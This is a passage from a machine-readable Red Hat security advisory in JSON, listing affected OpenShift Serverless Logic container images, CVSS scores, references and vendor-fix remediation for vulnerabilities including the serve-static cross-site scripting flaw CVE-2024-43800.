"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8023"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "send: Code Execution Vulnerability in Send Library"
},
{
"cve": "CVE-2024-43800",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:33.631718+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311154"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "serve-static: Improper Sanitization in serve-static",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "rhdh-hub-container 1.2 and 1.3 have included patches for this vulnerability.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43800"
},
{
"category": "external",
"summary": "RHBZ#2311154",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311154"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43800",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43800"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b",
"url": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa",
"url": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p",
"url": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p"
}
],
"release_date": "2024-09-10T15:15:17.937000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-14T00:59:58+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8023"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
